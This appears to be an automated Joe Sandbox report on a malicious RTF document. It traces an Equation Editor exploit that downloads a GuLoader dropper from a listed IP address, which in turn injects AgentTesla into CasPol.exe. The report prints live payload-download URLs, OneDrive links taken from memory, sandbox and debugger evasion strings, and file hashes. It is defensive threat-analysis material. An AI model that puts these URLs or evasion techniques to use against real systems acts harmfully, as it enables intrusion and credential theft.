            Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr
            Source: ~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp.0.drInitial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara matchFile source: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003E1E1A push edi; iretd 4_2_003E1E1C
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003E416D pushfd ; ret 4_2_003E4171
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003E2A8B pushfd ; retf 4_2_003E2A8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056CCF0 push dword ptr [edx]; retn 5B3Bh9_2_0056DE5F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00562A5E pushad ; ret 9_2_00562A61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\misv.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\Acly3.exeJump to dropped file

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect Any.run
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exe File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=\MISV.EXEHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21129&AUTHKEY=AC3DY6XZGK4LCRCHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21130&AUTHKEY=AF6G200UHTICGQA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796 Thread sleep time: -240000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2660 Thread sleep time: -300000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0056C015 rdtsc
            Source: C:\Users\Public\vbc.exe Code function: 3_2_00406873 FindFirstFileW,FindClose
            Source: C:\Users\Public\vbc.exe Code function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\Public\vbc.exe Code function: 3_2_0040290B FindFirstFileW
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exe System information queried: ModuleInformation
            Source: CasPol.exe, 00000009.00000002.680256332.00000000008D0000.00000004.00000020.sdmp Binary or memory string: VMware_S
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=\misv.exehttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6XZGk4Lcrchttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200UHTiCgqA
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            Hides threads from debuggers
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exe Thread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0056C015 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_00570CCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_00570114 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_00567A91 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_00572332 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_0056B7B6 mov eax, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion:

            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 560000
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
            Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmp Binary or memory string: !Progman
            Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmp Binary or memory string: Program Manager<
            Source: C:\Users\Public\vbc.exe Code function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

            Stealing of Sensitive Information:

            Yara detected AgentTesla
            Source: Yara match File source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY
            GuLoader behavior detected
            Source: Initial file Signature Results: GuLoader behavior
            Source: Yara match File source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected AgentTesla
            Source: Yara match File source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Exploitation for Client Execution 13 | Path Interception | Access Token Manipulation 1 | Masquerading 111 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Modify Registry 1 | LSASS Memory | Security Software Discovery 411 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 21 | Security Account Manager | Virtualization/Sandbox Evasion 21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 112 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 5 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

            Behavior Graph

            [Behavior graph image not reproduced. Behavior Graph ID: 532227; Sample: T81Ip9NCGi; Startdate: 01/12/2021; Architecture: WINDOWS; Score: 100. Process chain shown: EQNEDT32.EXE -> vbc.exe -> Acly3.exe -> CasPol.exe -> misv.exe.]


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            T81Ip9NCGi.rtf | 36% | ReversingLabs | Document-RTF.Trojan.Heuristic
            T81Ip9NCGi.rtf | 100% | Avira | HEUR/Rtf.Malformed

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Roaming\misv.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 20% | ReversingLabs | Win32.Downloader.GuLoader
            C:\Users\Public\vbc.exe | 20% | ReversingLabs | Win32.Downloader.GuLoader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://scas.openformatrg/drawml/2006/main | 0% | Avira URL Cloud | safe
            http://192.3.122.180/1100/vbc.exe | 100% | Avira URL Cloud | malware
            http://ocsp.entrust.net03 | 0% | URL Reputation | safe
            http://schemas.openformatrg/package/2006/content-t | 0% | URL Reputation | safe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
            http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
            http://schemas.open | 0% | URL Reputation | safe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
            http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
            http://schemas.openformatrg/package/2006/r | 0% | URL Reputation | safe
            http://www.%s.comPA | 0% | URL Reputation | safe
            http://ocsp.entrust.net0D | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            onedrive.live.com | unknown | unknown | false | | high
            eruitg.bl.files.1drv.com | unknown | unknown | false | | high
            fspzka.bl.files.1drv.com | unknown | unknown | false | | high

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://192.3.122.180/1100/vbc.exe | true | Avira URL Cloud: malware | unknown
            https://onedrive.live.com/download?cid=5A15FDA1AE9 | false | | high

            URLs from Memory and Binaries


            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            192.3.122.180 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

            General Information

            Joe Sandbox Version: 34.0.0 Boulder Opal
            Analysis ID: 532227
            Start date: 01.12.2021
            Start time: 20:57:06
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 7m 37s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: T81Ip9NCGi (renamed file extension from none to rtf)
            Cookbook file name: defaultwindowsofficecookbook.jbs
            Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed: 13
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.troj.expl.evad.winRTF@14/13@3/1
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 100% (good quality ratio 97.1%)
            • Quality average: 84.4%
            • Quality standard deviation: 23.8%
            HCA Information: Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.43.12
            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, l-0003.dc-msedge.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532227/sample/T81Ip9NCGi.rtf

                                                              Simulations

                                                              Behavior and APIs

                                                              Time | Type | Description
                                                              20:57:18 | API Interceptor | 51x Sleep call for process: EQNEDT32.EXE modified
                                                              20:58:28 | API Interceptor | 213x Sleep call for process: Acly3.exe modified
                                                              20:59:17 | API Interceptor | 64x Sleep call for process: CasPol.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              Match | Associated Sample Name / URL | Detection | Context
                                                              192.3.122.180 | QEw7lxB2iE.rtf | malicious | 192.3.122.180/2200/vbc.exe
                                                              192.3.122.180 | RFQ with Specification (Fitch Solutions).docx | malicious | 192.3.122.180/1100/vbc.exe
                                                              192.3.122.180 | 3wdkxO3rGv.rtf | malicious | 192.3.122.180/55667/vbc.exe
                                                              192.3.122.180 | zoe3408r0Z.docx | malicious | 192.3.122.180/3222/vbc.exe

                                                              Domains

                                                              No context

                                                              ASN


                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              Match | Associated Sample Name / URL | Detection
                                                              C:\Users\user\AppData\Roaming\misv.exe | QEw7lxB2iE.rtf | malicious
                                                              C:\Users\user\AppData\Roaming\misv.exe | sKxsGhU1Wg.exe | malicious
                                                              C:\Users\user\AppData\Local\Temp\Acly3.exe | QEw7lxB2iE.rtf | malicious
                                                              C:\Users\user\AppData\Local\Temp\Acly3.exe | sKxsGhU1Wg.exe | malicious
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | QEw7lxB2iE.rtf | malicious
                                                              C:\Users\Public\vbc.exe | QEw7lxB2iE.rtf | malicious

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:downloaded
                                                                          Size (bytes):131595
                                                                          Entropy (8bit):7.073841941088541
                                                                          Encrypted:false
                                                                          SSDEEP:3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
                                                                          MD5:99BDB5995C8DD619A3EC2B799D1CF868
                                                                          SHA1:7EB9E30BA8572F07A1E88972AD8F14954E84EB39
                                                                          SHA-256:C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
                                                                          SHA-512:8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 20%
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious
                                                                          Reputation:low
                                                                          IE Cache URL:http://192.3.122.180/1100/vbc.exe
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):3.9382976026552097
                                                                          Encrypted:false
                                                                          SSDEEP:48:ruLgOdZw1wQ5l/8bc3ABCOktG0/RIoj+WRdpzH:2BZmwQ5l/n3ABJf0J5jRRP
                                                                          MD5:CDAED283D66EF69103EAB36E7A087231
                                                                          SHA1:DE3A1270341A60F1BCF6657155E470DAE1505473
                                                                          SHA-256:C7D64784E1C35D116D0C123DECC90931F1B077829C15DF31C5FA9B4A7221AE47
                                                                          SHA-512:9A3F49CD4CDE57113A5616B12F8C244FD772C5AC600FA3931E7488E7176FB3FB24D279F708B246D62DFF7F9E33B304CE15C0649A8277666FB903BD8CEA9A506D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAA38BD7-6E2E-4485-B33A-19C659167A7E}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):0.05390218305374581
                                                                          Encrypted:false
                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D5BFD7-E4B2-42A8-9D9F-4F62C3EB8116}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3774
                                                                          Entropy (8bit):3.5540606276661406
                                                                          Encrypted:false
                                                                          SSDEEP:96:qUNznlUendEJjgCjk6/AT/xe6GpzSsP8XuSo:vNLlU3N4qAdelpI+
                                                                          MD5:1F3897864361C0D07786091F3C2CA1B9
                                                                          SHA1:45E2127F9AECB43545DEBEF1B7ADCF4E75603650
                                                                          SHA-256:BF5AD13992235C123456E15FAF52BD54F6DB416A277A5D9109F1174C74BF6F17
                                                                          SHA-512:39A8C13353340CF55881A028AB783F4482E056B71E20C7821F4986C6BF7262A28B3AEA05493B1063A2FF91F2DD7CDDD48CE69BE274EACC131724804CC0998380
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Process:C:\Users\Public\vbc.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):21304624
                                                                          Entropy (8bit):0.09518636040127255
                                                                          Encrypted:false
                                                                          SSDEEP:1536:j30RIkuZxe033g6Oixa+IC8KNXA/wMy2dWVu2h55nw6+717EQZ4yr3hShX:j30qHZxT3gsxaZmNXYy7zysx
                                                                          MD5:E32061DA9B34B82E0AB5D0E53CAF5A09
                                                                          SHA1:5AABAD649F6C4B826C30BDF8152E6F8D33CB8133
                                                                          SHA-256:7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
                                                                          SHA-512:EBF93E81A0AB530EA19131F490A2423E017384357731FBE5CAC4D60876C5B535E371BB9443D62AEA8F41D732079EAB2A6EDD4335EDEAAD086EED2410D5914F54
                                                                          Malicious:true
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious
                                                                          • Filename: sKxsGhU1Wg.exe, Detection: malicious
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\T81Ip9NCGi.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 03:57:13 2021, mtime=Thu Dec 2 03:57:13 2021, atime=Thu Dec 2 03:57:16 2021, length=18403, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):1014
                                                                          Entropy (8bit):4.531820687735484
                                                                          Encrypted:false
                                                                          SSDEEP:12:8N2PFgXg/XAlCPCHaXeBhB/z+X+Wnba/sAm4Ticvbly41sAm4VDtZ3YilMMEpxRG:8N4/XTuzc15AseCAjDv3q7Qd7Qy
                                                                          MD5:8593369DA2490C4D690D72E160EC2CA3
                                                                          SHA1:4FC38185BEEEC9C367C20A048077C56D56A0B2D4
                                                                          SHA-256:34C5DFDBE2E81FB98D38382C1C530D3E95AF48709CC84EF9BE6E46BB0BE6723F
                                                                          SHA-512:D92CF3B334A39874B8CFECBCADE7DD6F626412E4411CD3E53C7566076B8D89EC8280CF60D2D8DC0ADCA68DCA9A945B87AA6FE42B1FA5B140883C48EEE8F2944D
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):72
                                                                          Entropy (8bit):4.748011161929185
                                                                          Encrypted:false
                                                                          SSDEEP:3:bDuMJlpWsVtvomxW6Btvov:bCiWsVVjVy
                                                                          MD5:1D77163C0F35431030160BF3341C3B4B
                                                                          SHA1:BB1F38491850D9953B0CA1E2492D4D55B39F3E50
                                                                          SHA-256:D1DEC03FB357CAEBB191B639244E0762D6F8F177BAD7E314AE80B952BDE8C384
                                                                          SHA-512:2EB3AB0A9775433EB7285364B4F5534EE4EA50725611754D4A262C030763D164A13A1DA5E20B96F550894E006711E4C16F91B8A346A4142216EF045002D2D798
                                                                          Malicious:false
                                                                          Preview: [folders]..Templates.LNK=0..T81Ip9NCGi.LNK=0..[misc]..T81Ip9NCGi.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\3RY9W7X3.txt
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):62
                                                                          Entropy (8bit):4.029999133836105
                                                                          Encrypted:false
                                                                          SSDEEP:3:vpqMLJUQ2lOCsRRGcTk/n:vEMWXlOCsRR6
                                                                          MD5:ADB392BC717EDD06CE9EC32DCECFE628
                                                                          SHA1:EED907EBCE20C46D1FCC3D55AA60C896FCA0543D
                                                                          SHA-256:60AB9E8D2AB8FE84107A6DEC8FBBFAED35786593B2D17E05D116CAFAE84FADC2
                                                                          SHA-512:F8C69C818D06E9F8E2AFCFD42126671DAF8AA578BA5F7510C2159EC401DB0DB010D26C778996BA64FA86BDEE47D3A9A0B655EAAA9DB2E76B08336CDC3EFFB3BA
                                                                          Malicious:false
                                                                          IE Cache URL:live.com/
                                                                          Preview: wla42..live.com/.1536.738723328.30927982.255686239.30926650.*.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\W56Z07SP.txt
